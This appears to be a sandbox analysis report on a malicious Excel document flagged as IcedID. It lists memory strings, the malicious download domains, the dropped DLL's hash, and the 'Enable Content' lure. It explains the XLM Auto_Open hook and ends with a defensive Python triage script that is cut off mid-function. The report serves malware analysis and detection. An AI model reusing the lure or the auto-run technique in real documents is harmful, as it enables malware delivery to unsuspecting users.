https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net 
https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: thousandsyears.download
Source: global traffic | HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 15:49:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xf2IDfcLQCVH1rz6byqCytHzvmEvCgcaCZRg%2F9gUSLGEhZx6kGlSL%2BnZB0MJnL3Kz5tZUf2obw5UnExmwPSZFk8Kddx%2FnyTc43EeLUX3kCfMGteS4IxdgGxjDeCGf2BD7A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9fc654c6c4e8b-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Source: regsvr32.exe, 00000004.00000002.2104252474.000000000031E000.00000004.00000020.sdmp | String found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobile
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic-china.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d1fgizr415o1r6.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1hemuljm71t2j.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1le29qyzha1u4.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1oqpvwii7b6rh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1vo51ubqkiilx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dftu77xade0tc.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://f0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2104184000.00000000002AE000.00000004.00000020.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100828150.00000000002B4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1CHJ6T7PJFDAQP338P4HHX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://prod.log.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://prod.tools.shortbread.aws.dev
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-messaging-pricing-information/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/public-pricing-agc/
        Source: regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://spot-bid-advisor.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://view-stage.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443

        E-Banking Fraud:

        Yara detected IcedID
        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: Yara match | File source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        System Summary:

        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Document image extraction number: 0 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0 | Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1 | Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1 | Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_001B1678 NtQuerySystemInformation,RtlAllocateHeap
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_001B1810
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000007FEF8FB41BF
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View | Dropped File: C:\Users\user\XTOWN.dll 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Note: both dropped files carry the same SHA256, so they are one download written twice: lsdfik[1].fml is the copy in the Internet Explorer download cache (the ".fml" name does not match the PE content, hence the "non-matching file extension" signature) and XTOWN.dll is the copy placed in the root of the user's profile.
        Source: workbook.xml | Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><fileVersion appName="xl" lastEdited="6" lowestEdited="6" rupBuild="14420"/><workbookPr filterPrivacy="1" defaultThemeVersion="164011"/><bookViews><workbookView xWindow="0" yWindow="0" windowWidth="22260" windowHeight="12645"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Sheet1" sheetId="8" r:id="rId2"/><sheet name="Sheet2" sheetId="4" r:id="rId3"/><sheet name="Sheet3" sheetId="2" r:id="rId4"/><sheet name="Sheet4" sheetId="3" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName></definedNames><calcPr calcId="162913"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
        Note: the defined name _xlnm.Auto_Open pointing at Sheet3!$CA$13 is Excel's built-in auto-start hook for Excel 4.0 (XLM) macros. Once the user clicks "Enable Content", Excel starts executing the macro formulas beginning at that cell as soon as the workbook opens; no VBA project is needed for this, which is why VBA-only macro scanners miss it.
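        The check an analyst wants to run over such a file before opening it in Excel is a static one: pull every defined name out of xl/workbook.xml, flag the XLM auto-run hooks, and list any macro sheet parts or VBA project in the container. The code below is an added example, not part of the sandbox report or of any Joe Sandbox tooling; it embeds a trimmed copy of the workbook.xml above inside a constructed in-memory zip so it runs offline, and the extra part names it can add (xl/macrosheets/sheet1.xml, xl/vbaProject.bin) are constructed for the test, not observed in the sample.

```python
"""Added example (not from the report): list Excel 4.0 (XLM) auto-run hooks and
macro-bearing parts inside an .xlsm/.xlsx/.xlsb zip container."""
import io
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"

# Defined names Excel honours as XLM auto-run hooks. Name matching is
# case-insensitive in Excel, and built-in names carry the "_xlnm." prefix.
AUTO_RUN_NAMES = ("auto_open", "auto_close", "auto_activate", "auto_deactivate")

# Constructed input: the <sheets> and <definedNames> parts of the workbook.xml the
# report extracted from the sample, trimmed to the elements this parser reads.
SAMPLE_WORKBOOK_XML = (
    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
    'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
    "<sheets>"
    '<sheet name="Sheet" sheetId="1" r:id="rId1"/>'
    '<sheet name="Sheet1" sheetId="8" r:id="rId2"/>'
    '<sheet name="Sheet2" sheetId="4" r:id="rId3"/>'
    '<sheet name="Sheet3" sheetId="2" r:id="rId4"/>'
    '<sheet name="Sheet4" sheetId="3" r:id="rId5"/>'
    "</sheets>"
    "<definedNames>"
    '<definedName name="_xlnm.Auto_Open">Sheet3!$CA$13</definedName>'
    "</definedNames>"
    "</workbook>"
)


def build_sample_container(extra_parts=()):
    """Constructed .xlsm-like zip: the sample workbook.xml plus optional empty parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", SAMPLE_WORKBOOK_XML)
        for name in extra_parts:
            zf.writestr(name, b"")
    return buf.getvalue()


def is_auto_run_name(name):
    """True for Auto_Open and friends, with or without the _xlnm. prefix, any case."""
    lowered = name.lower()
    if lowered.startswith("_xlnm."):
        lowered = lowered[len("_xlnm."):]
    return lowered in AUTO_RUN_NAMES


def triage_workbook(container_bytes):
    """Return auto-run defined names (name, target cell, hidden flag), the XLM
    macro sheet parts and whether a VBA project is present in the container."""
    result = {"auto_run": [], "macrosheets": [], "vba_project": False}
    with zipfile.ZipFile(io.BytesIO(container_bytes)) as zf:
        names = zf.namelist()
        result["macrosheets"] = sorted(n for n in names if n.startswith("xl/macrosheets/"))
        result["vba_project"] = "xl/vbaProject.bin" in names
        root = ET.fromstring(zf.read("xl/workbook.xml"))
    for dn in root.iter(MAIN_NS + "definedName"):
        name = dn.get("name", "")
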